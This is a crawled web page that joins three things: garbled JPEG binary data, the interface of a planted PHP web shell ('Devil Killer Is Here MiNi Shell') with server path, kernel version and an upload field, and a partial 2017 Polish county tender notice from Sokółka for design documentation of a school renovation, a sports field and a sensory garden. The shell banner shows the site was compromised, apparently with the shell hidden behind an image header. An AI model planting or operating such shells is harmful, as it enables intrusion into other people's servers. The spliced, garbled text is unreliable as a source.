JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170502/78031-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sokolka-powiat.pl' target='_blank'>http://www.sokolka-powiat.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 78031 - 2017
              z dnia 2017-05-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Sokółka: Opracowanie dokumentacji projektowo-kosztorysowej na potrzeby realizacji projektu "Cudowny świat"<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt pt. Cudowny świat realizowany w ramach Programu Współpracy Transganicznej Polska-Białoruś Ukraina 2014-2010</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Powiatu Sokólskiego, krajowy numer identyfikacyjny
              5065862800000, ul.
              ul. Marsz. J. Piłsudskiego 
              8,
              16100  
              Sokółka, woj.
              podlaskie, państwo
              Polska, tel.
              857 112 008, e-mail
              starostwo@sokolka-powiat.pl, faks
              .
              <br />
              Adres strony internetowej (URL): wwww.sokolka-powiat.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.sokolka-powiat.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.sokolka-powiat.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />przesłać za pośrednictwem operatora pocztowego, kurierem lub dostarczyć osobiście do siedziby zamawiającego<br />
                Adres:
                <br />Starostwo Powiatowe w Sokółce, ul. Marsz. J. Piłsudskiego 8 16-100 Sokółka - punkt obsługi klientana Biurze Podawczym</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowo-kosztorysowej na potrzeby realizacji projektu "Cudowny świat"<br /><b>Numer referencyjny: </b>OR-IV.272.3.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zamawiający zaplanował następujący zakres prac projektowych objętych zamówieniem:
1. przy remoncie części administracyjnej budynku warsztatów szkolnych przy Zespole Szkół Zawodowych w Sokółce: 
- wykonanie dokumentacji projektowo-kosztorysowej ogólnobudowlanej wraz z wentylacją (bez wymiany stolarki okiennej i drzwi zewnętrznych), dokumentacji projektowo  kosztorysowej modernizacji wewnętrznej instalacji elektrycznej, dokumentacji projektowo - kosztorysowej sieci komputerowej (zasilającej i logicznej z wyposażeniem serwerowni), dokumentacji projektowo - kosztorysowej telewizji przemysłowej wewnątrz i na zewnątrz budynku, dokumentacji projektowo - kosztorysowej instalacji antywłamaniowej,
Przedmiotem zamówienia objęte jest również pełnienie funkcji inspektora nadzoru inwestorskiego w trakcie realizacji prac objętych zamówieniem od dnia rozpoczęcia robót budowlanych do dnia odbioru końcowego robót.

2. przy budowie boiska wielofunkcyjnego na działce 3102/3 przy budynku Zespołu Szkół Zawodowych w Sokółce:
- wykonanie dokumentacji projektowo-kosztorysowej boiska wielofunkcyjnego o powierzchni poliuretanowej o wymiarach pozwalających na usytuowanie pełnowymiarowego boiska do piłki ręcznej, futsalu, koszykówki i dwóch poprzecznych boisk do siatkówki. Wzdłuż jednej z krawędzi należy zaprojektować czterotorową bieżnię o powierzchni poliuretanowej o długości pozwalającej rozgrywanie zawodów biegowych na dystansie do 100 m wydłużoną o start i dobieg oraz zakończoną zeskokiem do skoku w dal i trójskoku. Wzdłuż drugiej krawędzi należy zaprojektować ściankę wspinaczkową o wysokości min. 8 m. w kształcie zbliżonym do prostopadłościanu z wywieszeniem 2 m. przynajmniej przy jednej z krawędzi ścianki. W bezpośrednim sąsiedztwie boiska należy zaprojektować siłownię napowietrzną, w której skład weszłyby np.: orbitrek lub biegacz, wyciskanie siedząc, wioślarz, motyl, podciąg nóg, poręcz, trenażer ramion, twister. 
Wzdłuż dłuższych krawędzi należy zaprojektować po dwa rzędy ławek dla widzów.
Należy zaprojektować piłkochwyty za bramkami wraz z ogrodzeniem od strony granicy działki, ciągi komunikacyjne z dojściem do projektowanych obiektów (w tym przebudowę chodnika i drogi wewnętrznej przed budynkiem Zespołu Szkół Zawodowych), oświetlenie zewnętrzne i monitoring boiska, siłowni i ścianki wspinaczkowej a także przygotować wykaz niezbędnego wyposażenia projektowanego obiektu.
Przed przystąpieniem do fazy projektowania, Wykonawca zobowiązany jest wykonać inwentaryzację terenu inwestycji, która będzie stanowić część opisową dokumentacji projektowej. Inwentaryzacja powinna zawierać co najmniej: zwięzłą ocenę stanu istniejącego terenu przeznaczonego na inwestycję, inwentaryzację i ocenę zieleni, dokumentację fotograficzną, proponowane rozwiązania techniczno-funkcjonalne, wskazówki co do odprowadzenia wód opadowych z terenu inwestycji. W związku z tym, iż dokumentacja projektowa stanowić będzie podstawę do wszczęcia procedury zgłoszenia robót budowlanych/pozwolenia na budowę oraz stanowić będzie podstawę do przeprowadzenia postępowania o udzielenie zamówienia publicznego na wykonanie robót nią objętych, przedmiot zamówienia musi zostać wykonany zgodnie z warunkami i założeniami opisanymi w Specyfikacji Istotnych Warunków Zamówienia i wzorze umowy; zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej, w tym w szczególności:
 a) projektowany obiekt winien spełniać wymogi stawiane dla obiektów sportowych o nawierzchni poliuretanowej, oraz być przystosowany dla osób niepełnosprawnych, 
b) wszelkie wyposażenie obiektu musi być zgodne z aktualnymi normami oraz spełniać wymogi Rozporządzenia Ministra Edukacji Narodowej z dnia 31 grudnia 2002 roku w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach. 
Przedmiotem zamówienia objęte jest również pełnienie funkcji inspektora nadzoru inwestorskiego w trakcie realizacji prac objętych zamówieniem od dnia rozpoczęcia robót budowlanych do dnia odbioru końcowego robót.

3 przy budowie ogrodu polisensorycznego przy Specjalnym Ośrodku Szkolno-Wychowawczym w Sokółce zakłada się stworzenie infrastruktury przestrzennej umożliwiającej stymulowanie zmysłów - dotyku, węchu, słuchu, wzroku i smaku z wykorzystaniem ukształtowania terenu, istniejącej i projektowanej roślinności, projektowanych ścieżek i obiektów małej architektury. Planuje się wykonanie: oczka wodnego (kaskada-wodospad) podświetlanego, z obiegiem zamkniętym wody; miejsca na ognisko i grilla z wiatą oraz stałymi siedziskami; placu do rozgrywania gier i zawodów sprawnościowych ze stałymi siedziskami dla uczestników tychże zawodów i publiczności, placu rehabilitacyjno-edukacyjnego z linearium, trampoliną, huśtawką, karuzelą, mostkiem, tunelem; ogrodów: kwiatowego i warzywnego na wyniesionych rabatach z roślinami kwitnącymi i owocującymi głównie na początku i pod koniec lata (ze względu na przerwę wakacyjną w Ośrodku); ścieżek: przyrodniczo-edukacyjnych i rowerowych o różnorodnych nawierzchniach (z kostki granitowej, kostki betonowej, bruku kamiennego z otoczaków, żwirowe, piaskowe, z kory lub zrębków); nasadzeń drzew i krzewów iglastych i liściastych, w tym owocowych o ciekawych cechach i właściwościach. 
Należy zaprojektować nowe ogrodzenie z bramami przesuwnymi, furtkami, wjazdami i wejściami od strony ulicy Osiedle Zielone.
Przy projektowaniu należy uwzględnić rozmieszczenie punktów świetlnych o walorach użytkowo-dekoracyjnych, rozmieszczenie różnorodnych instrumentów muzycznych tj. gongi, instrumenty perkusyjne, dzwony, dzwonki, piszczałki, telefon-tubę,
Należy zaprojektować system monitoringu na całym terenie obejmującym ogród sensoryczny.
Przed przystąpieniem do fazy projektowania, Wykonawca zobowiązany jest wykonać inwentaryzację terenu inwestycji, która będzie stanowić część opisową dokumentacji projektowej, ująć do wyburzenia zbędne wiaty lub budynki gospodarcze, chyba że mogłyby być wykorzystane w późniejszym procesie projektowania. Inwentaryzacja powinna zawierać co najmniej: zwięzłą ocenę stanu istniejącego terenu przeznaczonego na inwestycję, inwentaryzację i ocenę zieleni, dokumentację fotograficzną, proponowane rozwiązania techniczno-funkcjonalne, wskazówki co do odprowadzenia wód opadowych z terenu inwestycji. W związku z tym, iż dokumentacja projektowa stanowić będzie odpowiednio podstawę do wszczęcia procedury zgłoszenia robót budowlanych/pozwolenia na budowę oraz stanowić będzie podstawę do przeprowadzenia postępowania o udzielenie zamówienia publicznego na wykonanie robót nią objętych, przedmiot zamówienia musi zostać wykonany zgodnie z warunkami i założeniami opisanymi w Specyfikacji Istotnych Warunków Zamówienia i wzorze umowy; zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej, w tym w szczególności: 
a) projektowany obiekt winien być przystosowany dla osób niepełnosprawnych, 
b) wszelkie wyposażenie obiektu musi być zgodne z aktualnymi normami oraz spełniać wymogi Rozporządzenia Ministra Edukacji Narodowej z dnia 31 grudnia 2002 roku w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach.
Przedmiotem zamówienia objęte jest również pełnienie funkcji inspektora nadzoru inwestorskiego w trakcie realizacji ogrodu polisensorycznego od dnia rozpoczęcia robót budowlanych do dnia odbioru końcowego robót.
<br /><br /><b>II.5) Główny kod CPV: </b>71220000-6<br /><b> Dodatkowe kody CPV:</b>71221000-3,
                71222000-0,
                71247000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 19/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowego warunku w tym zakresie.Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna warunek zdolności technicznej za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wykonał:
	-) w przypadku I części zamówienia - co najmniej jedną dokumentację projektowo-kosztorysową na budowę, przebudowę lub remont budynku użyteczności publicznej  o powierzchni użytkowej nie mniejszej, niż 300 m2,
	-) w przypadku II części zamówienia co najmniej jedną dokumentację projektowo-kosztorysową na budowę lub przebudowę boiska wielofunkcyjnego o powierzchni poliuretanowej,
	-) w przypadku III części zamówienia co najmniej jedną dokumentację projektowo-kosztorysową na budowę ogrodu polisensorycznego lub architektury krajobrazu z elementami małej architektury o powierzchni minimum 4 000 m2,
Zamawiający uzna warunek zdolności zawodowej za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia tj. co najmniej po jednej osobie z uprawnieniami budowlanymi do projektowania:
	-) w przypadku I części zamówienia - w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności,  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych, kanalizacyjnych i wentylacyjnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności,
	-) w przypadku II części zamówienia - w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności,  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych, kanalizacyjnych i wentylacyjnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności,
	-) w przypadku III części zamówienia - w specjalności konstrukcyjno-budowlanej lub urbanistycznej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności,  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych, kanalizacyjnych i wentylacyjnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, z co najmniej 2-letnim doświadczeniem zawodowym na stanowisku projektanta w swojej specjalności,
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz wykonanych usług (dokumentacja projektowo-kosztorysową na budowę, przebudowę lub remont budynku użyteczności publicznej  o powierzchni użytkowej nie mniejszej, niż 300 m2) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (druk stanowiący załącznik nr 5 do SIWZ) oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane,
2. Wykaz wykonanych usług (dokumentację projektowo-kosztorysową na budowę lub przebudowę boiska wielofunkcyjnego o powierzchni poliuretanowej) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (druk stanowiący załącznik nr 5 do SIWZ) oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane,
3. Wykaz wykonanych usług (dokumentację projektowo-kosztorysową na budowę ogrodu polisensorycznego lub architektury krajobrazu z elementami małej architektury o powierzchni 4 000 m2) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (druk stanowiący załącznik nr 5 do SIWZ) oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane,
4. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami (druk stanowiący załącznik nr 6 do SIWZ),
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
